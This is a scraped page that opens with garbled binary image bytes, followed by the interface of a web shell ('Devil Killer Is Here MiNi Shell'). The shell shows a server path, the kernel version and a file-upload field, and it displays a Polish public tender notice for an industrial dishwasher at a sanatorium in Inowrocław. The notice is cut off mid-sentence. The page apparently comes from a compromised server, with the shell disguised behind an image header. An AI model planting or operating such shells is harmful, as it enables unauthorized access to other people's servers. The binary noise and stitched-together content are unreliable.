JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240618/0037163601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa i montaż zmywarki gastronomicznej przemysłowej<br/> oraz zintegrowanych z nią stołów na potrzeby <br/>Sanatorium Uzdrowiskowego „Przy Tężni&#34; im. dr Józefa Krzymińskiego w Inowrocławiu s.p.z.o.z. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SANATORIUM UZDROWISKOWE &#34;PRZY TĘŻNI&#34; IM. DR JÓZEFA KRZYMIŃSKIEGO W INOWROCŁAWIU S.P.Z.O.Z.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010625117</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Przy Stawku 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Inowrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">88-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL617 - Inowrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@przytezni.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.przytezni.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa i montaż zmywarki gastronomicznej przemysłowej<br/> oraz zintegrowanych z nią stołów na potrzeby <br/>Sanatorium Uzdrowiskowego „Przy Tężni&#34; im. dr Józefa Krzymińskiego w Inowrocławiu s.p.z.o.z. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-72b5f6fe-2d61-11ef-86d2-4e696a6d8c25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00371636</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00025489/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa i montaż zmywarki gastronomicznej przemysłowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/przytezni <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/przytezni</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami odbywa się w formie elektronicznej za pośrednictwem platformy w odniesieniu do wszelkich oświadczeń, wniosków, zawiadomień oraz informacji. <br/><br/>https://platformazakupowa.pl/pn/przytezni</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1.	Administratorem Pani/Pana danych osobowych jest Sanatorium Uzdrowiskowe &#34;Przy Tężni&#34;im. dr Józefa Krzymińskiego w Inowrocławiu s.p.z.o.z. z siedzibą w Inowrocławiu, ul. Przy Stawku 12, 88-100 Inowrocław.<br/>2.	Wyznaczono Inspektora Ochrony Danych Osobowych i mogą Państwo się z nim kontaktować za pośrednictwem poczty elektronicznej pod adresem: iod@przytezni.pl.<br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b, c i f RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego tj. uczestnictwem w prowadzonym postępowaniu, zawarciem oraz wykonaniem umowy , w tym składanie reklamacji oraz kontaktowanie się w związku z realizacją umowy, realizacji obowiązków wynikających z przepisów podatkowych i rachunkowych , dochodzenie roszczeń lub obrony przed roszczeniami<br/>4.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o przepisy ustawy Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 ze zm.), dalej ustawa Pzp<br/>5.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Prawo zamówień publicznych, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>6.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/ Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Prawo zamówień publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Prawo zamówień publicznych.<br/>7.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/><br/>8.	Posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych oraz otrzymania ich kopii;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Prawo zamówień publicznych oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-5-2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest „Dostawa i montaż zmywarki gastronomicznej przemysłowej oraz zintegrowanych z nią stołów na potrzeby Sanatorium Uzdrowiskowego „Przy Tężni&#34; im. dr Józefa Krzymińskiego w Inowrocławiu s.p.z.o.z.” zgodnie ze specyfikacją techniczną – zał. Nr 1 A do SWZ.<br/>2. Zakres zamówienia obejmuje dostawę, montaż zmywarki, o której mowa w ust. 1, zwanej dalej w SWZ zmywarką, wraz z demontażem i utylizacją urządzeń, w miejsce których montowana będzie zmywarka i oraz uruchomieniem zmywarki.<br/>3. Wykonawca zobowiązany jest do przeszkolenia na swój koszt personelu Zamawiającego w zakresie obsługi, konserwacji i napraw zmywarki. Pierwsze szkolenie odbędzie się bezpośrednio po montażu i uruchomieniu zmywarki. Kolejne szkolenie w terminie 2 tygodni, następne w terminie 4 tygodni, następne w terminie 3 miesięcy, licząc od daty montażu i uruchomienia zmywarki. Wszystkie szkolenia odbędą się w siedzibie Zamawiającego. Szkolenia w zakresie obsługi, konserwacji i napraw niewymagających interwencji serwisu zostaną potwierdzone certyfikatem.<br/><br/>4. Szczegółowy opis przedmiotu zamówienia znajduje się w specyfikacji technicznej przedmiotu zamówienia tj. zał. Nr 1 A do SWZ.<br/>5. Zamawiający informuje, że oferta musi obejmować całość przedmiotu zamówienia oraz spełniać wymagania określone w specyfikacji technicznej przedmiotu zamówienia. W przeciwnym wypadku oferta zostanie odrzucona jako niezgodna z warunkami zamówienia.<br/>6. Wykonawca zobowiązany jest w ramach oferowanej gwarancji wykonywać przeglądy zalecane przez producenta. Ostatni przegląd w ostatnim miesiącu gwarancji, wszystkie czynności związane z wykonaniem przeglądu odbywać się będą na koszt Wykonawcy.<br/>7. Wykonawca w dniu podpisania protokołu zdawczo-odbiorczego będzie zobowiązany do dostarczenia:<br/>- paszportu technicznego,<br/>- instrukcji obsługi,<br/>- licencji i certyfikatów<br/>- dokumentacji techniczno – ruchowej,<br/>- instrukcji serwisowych w tym schematy, procedury i instrukcje oraz wykaz punktów<br/>serwisowych i wykaz dostawców części zamiennych oraz materiałów zużywalnych<br/>i eksploatacyjnych.<br/><br/>8. Zamawiający wymaga minimum 48 miesięcy gwarancji na oferowany przedmiot zamówienia. Dłuższy okres gwarancji będzie punktowany w ramach kryterium oceny ofert.<br/><br/>9. Zaleca się po uprzednim zgłoszeniu telefonicznym bądź pisemnym do przeprowadzenia wizji lokalnej w celu uzyskania wszelkich informacji koniecznych do właściwego przygotowania oferty. Kontakt telefoniczny – Pani Beata Czachorowska 52 3581340<br/><br/>10. Dostawę przedmiotu zamówienia do siedziby Zamawiającego zapewnia Wykonawca ponosząc koszty i ryzyko transportu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42959000-3 - Zmywarki do naczyń inne niż używane w gospodarstwie domowym</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-01-05</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 3.	Zamawiający żąda złożenia przez Wykonawcę wraz z ofertą następujących środków przedmiotowych:<br/>•	Katalog, folder lub ulotka oferowanej zmywarki zawierający szczegółowy opis oraz zwymiarowany rysunek techniczny oferowanego modelu przedmiotu zamówienia.<br/>•	Oświadczenie Wykonawcy, że oferowany przedmiot zamówienia jest dopuszczony do obrotu i używania na terenie RP zgodnie z obowiązującymi przepisami prawa oraz posiada certyfikaty, dekla-racje zgodności, świadectwa lub inne dokumenty spełniające wymagania określone w Eu-ropejskich Normach oraz Rozporządzeniu Ministra Gospodarki z dnia 21 października 2008 r. w sprawie zasadniczych wymagań dla maszyn, a także oświadczenie Wykonawcy, że dostarczy sto-sowne dokumenty na każde żądanie Zamawiającego w terminie przez niego wyznaczonym.<br/>•	Oświadczenie Wykonawcy, że oferowany przedmiot zamówienia jest kompletny i po jego zainsta-lowaniu i uruchomieniu będzie gotowy do pracy zgodnie z jego przeznaczeniem bez dodatkowych zakupów (poza materiałami eksploatacyjnymi).<br/>•	Oświadczenie Wykonawcy, że w ramach oferowanej gwarancji będą wykonywane przeglądy zalecane przez producenta oraz, że ostatni przegląd zostanie wykonany w ostatnim miesiącu gwaran-cji, oraz że wszystkie czynności związane z wykonaniem przeglądów odbywać się będą na koszt Wykonawcy. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 3.	Zamawiający żąda złożenia przez Wykonawcę wraz z ofertą następujących środków przedmiotowych:<br/>•	Katalog, folder lub ulotka oferowanej zmywarki zawierający szczegółowy opis oraz zwymiarowany rysunek techniczny oferowanego modelu przedmiotu zamówienia.<br/>•	Oświadczenie Wykonawcy, że oferowany przedmiot zamówienia jest dopuszczony do obrotu i używania na terenie RP zgodnie z obowiązującymi przepisami prawa oraz posiada certyfikaty, dekla-racje zgodności, świadectwa lub inne dokumenty spełniające wymagania określone w Eu-ropejskich Normach oraz Rozporządzeniu Ministra Gospodarki z dnia 21 października 2008 r. w sprawie zasadniczych wymagań dla maszyn, a także oświadczenie Wykonawcy, że dostarczy sto-sowne dokumenty na każde żądanie Zamawiającego w terminie przez niego wyznaczonym.<br/>•	Oświadczenie Wykonawcy, że oferowany przedmiot zamówienia jest kompletny i po jego zainsta-lowaniu i uruchomieniu będzie gotowy do pracy zgodnie z jego przeznaczeniem bez dodatkowych zakupów (poza materiałami eksploatacyjnymi).<br/>•	Oświadczenie Wykonawcy, że w ramach oferowanej gwarancji będą wykonywane przeglądy zalecane przez producenta oraz, że ostatni przegląd zostanie wykonany w ostatnim miesiącu gwaran-cji, oraz że wszystkie czynności związane z wykonaniem przeglądów odbywać się będą na koszt Wykonawcy. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Formularz ofertowy zał. nr 1 do SWZ.<br/>2.	Oświadczenie o spełnianiu warunków udziału w postępowaniu zał. nr 2 oraz oświadczenie o braku podstaw do wykluczenia z postępowania zał. nr 3 do SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców:<br/>•	oświadczenie o spełnianiu warunków udziału w postępowaniu tj. zał. nr 2 składa każdy z Wykonawców,<br/>• oświadczenie o braku podstaw do wykluczenia z postępowania zał. nr 3 składa każdy z Wykonawców<br/><br/>3.	Zamawiający żąda złożenia przez Wykonawcę wraz z ofertą następujących środków przedmiotowych:<br/>•	Katalog, folder lub ulotka oferowanej zmywarki zawierający szczegółowy opis oraz zwymiarowany rysunek techniczny oferowanego modelu przedmiotu zamówienia.<br/>•	Oświadczenie Wykonawcy, że oferowany przedmiot zamówienia jest dopuszczony do obrotu i używania na terenie RP zgodnie z obowiązującymi przepisami prawa oraz posiada certyfikaty, dekla-racje zgodności, świadectwa lub inne dokumenty spełniające wymagania określone w Eu-ropejskich Normach oraz Rozporządzeniu Ministra Gospodarki z dnia 21 października 2008 r. w sprawie zasadniczych wymagań dla maszyn, a także oświadczenie Wykonawcy, że dostarczy sto-sowne dokumenty na każde żądanie Zamawiającego w terminie przez niego wyznaczonym.<br/>•	Oświadczenie Wykonawcy, że oferowany przedmiot zamówienia jest kompletny i po jego zainsta-lowaniu i uruchomieniu będzie gotowy do pracy zgodnie z jego przeznaczeniem bez dodatkowych zakupów (poza materiałami eksploatacyjnymi).<br/>•	Oświadczenie Wykonawcy, że w ramach oferowanej gwarancji będą wykonywane przeglądy zalecane przez producenta oraz, że ostatni przegląd zostanie wykonany w ostatnim miesiącu gwaran-cji, oraz że wszystkie czynności związane z wykonaniem przeglądów odbywać się będą na koszt Wykonawcy.<br/><br/>4.	Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawców wspólnie ubiegających się o zamówienie w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – w przy-padku wspólnego ubiegania się o zamówienie przez wykonawców,<br/>Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy w przedmiotowym postępowaniu – w przypadku podpisania oferty przez osobę niewymienioną w dokumencie rejestracyjnym (ewidencyjnym) wykonawcy.<br/><br/>Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (w formie elektronicznej lub postaci elektronicznej opatrzonej kwalifikowanym podpisem elek-tronicznym, podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicz-nej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektro-nicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektro-nicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pi-semnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elek-troniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego.<br/><br/>5.	Zobowiązanie innego podmiotu zał. nr 5 do SWZ - jeżeli dotyczy. <br/>6.	Oświadczenie - oferta wspólna zał. Nr 6 do SWZ – jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wprowadzenie zmian w umowie dopuszczalne jest jedynie w przypadkach i na zasadach przewidzianych w ustawie Prawo Zamówień Publicznych. <br/>2.	Zamawiający dopuszcza możliwość wprowadzenia zmian do umowy w formie aneksu w następujących przypadkach: <br/>1)	zmiany terminu realizacji przedmiotu umowy z powodu :<br/>a)	działań osób trzecich uniemożliwiających realizację przedmiotu umowy, które to działania nie są konsekwencją winy którejkolwiek ze stron,<br/>b)	w przypadku zaistnienia okoliczności niezależnych od Wykonawcy, w szczególności w przypadku niemożliwego do przewidzenia na moment składania oferty braku dostępności asortymentu stanowiącego przedmiot umowy. W przypadku, o którym mowa w niniejszym ustępie, termin określony w § 2 ust. 2 może ulec przedłużeniu wyłącznie o udokumentowany czas trwania ww. okoliczności.<br/>2)	w razie konieczności zmiany sposobu realizacji z powodu zmian w obowiązujących przepisach prawa bądź wytycznych mających wpływ na wykonanie umowy,<br/>3) w przypadku konieczności uwzględnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,<br/>4)	zmiany stawki podatku VAT na usługi świadczone w ramach umowy, przy czym zmianie ulegnie tylko i wyłącznie wynagrodzenie jednostkowe brutto, wynagrodzenie jednostkowe netto pozostaje bez zmian. Nowa stawka 